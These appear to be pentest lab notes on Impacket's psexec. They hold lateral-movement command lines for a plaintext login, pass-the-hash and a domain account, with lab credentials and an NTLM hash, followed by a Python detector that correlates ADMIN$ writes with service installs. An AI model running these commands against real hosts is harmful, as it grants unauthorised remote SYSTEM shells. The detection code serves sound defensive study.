impacket-psexec

Psexec.py is a clone of the Sysinternals psexec executable, but works slightly differently from the original. The tool creates a remote service by uploading a randomly-named executable to the ADMIN$ share on the target host. It then registers the service via RPC and the Windows Service Control Manager. Once established, communication happens over a named pipe, providing an interactive remote shell as SYSTEM on the victim host. - hackthebox

# Connect to a local account
impacket-psexec administrator:'Password123!'@10.10.110.17
# Pass the hash attack
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
# Connect with a domain account (credentials noted below)
psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125

User - wley
Pass - transporter@4
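
A defender's view of the sequence described above (an executable written to ADMIN$, then a service registered through the Service Control Manager), as an added example that is not part of the original notes or of Impacket: it correlates Windows event 5145 (share access check) with event 7045 (service installed) on the same host. The sample events, the simplified field subset, the 60-second window and the function name are assumptions made for illustration.

```python
from datetime import datetime, timedelta
import ntpath

FILE_WRITE_DATA = 0x2  # AccessMask bit in event 5145 for writing file data

# Constructed sample events (not real logs). Keys are a simplified subset of
# the 5145 (share access check) and 7045 (service installed) event fields.
SAMPLE_EVENTS = [
    {"EventID": 5145, "Time": "2024-01-01T10:00:00", "Computer": "WS01",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "kQzLmPwA.exe",
     "AccessMask": "0x2", "IpAddress": "192.0.2.10"},
    {"EventID": 7045, "Time": "2024-01-01T10:00:02", "Computer": "WS01",
     "ServiceName": "xYzQ", "ImagePath": r"%systemroot%\kQzLmPwA.exe"},
    # Service whose binary was never written over ADMIN$: no match.
    {"EventID": 7045, "Time": "2024-01-01T11:00:00", "Computer": "WS01",
     "ServiceName": "UpdaterSvc", "ImagePath": r"C:\Program Files\Updater\upd.exe"},
    # Same file name, but installed on a different host: no match.
    {"EventID": 7045, "Time": "2024-01-01T10:00:05", "Computer": "WS02",
     "ServiceName": "abcd", "ImagePath": r"%systemroot%\kQzLmPwA.exe"},
]

def find_admin_share_service_installs(events, window_seconds=60):
    """Return 7045 installs whose binary was written to ADMIN$ just before."""
    window = timedelta(seconds=window_seconds)
    uploads, hits = [], []
    for ev in sorted(events, key=lambda e: e["Time"]):
        when = datetime.fromisoformat(ev["Time"])
        if ev["EventID"] == 5145:
            name = ntpath.basename(ev["RelativeTargetName"]).lower()
            wrote = int(ev["AccessMask"], 16) & FILE_WRITE_DATA
            if ev["ShareName"].upper().endswith("ADMIN$") and wrote and name.endswith(".exe"):
                uploads.append((ev["Computer"], name, when, ev["IpAddress"]))
        elif ev["EventID"] == 7045:
            # ADMIN$ maps to the Windows directory, so compare file names only.
            image = ntpath.basename(ev["ImagePath"].strip('"')).lower()
            for host, name, written, source_ip in uploads:
                if host == ev["Computer"] and name == image and when - written <= window:
                    hits.append({"host": host, "service": ev["ServiceName"],
                                 "binary": image, "source_ip": source_ip})
    return hits

if __name__ == "__main__":
    for hit in find_admin_share_service_installs(SAMPLE_EVENTS):
        print(hit)
```

Event 5145 is only logged when the Detailed File Share audit subcategory is enabled on the host.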
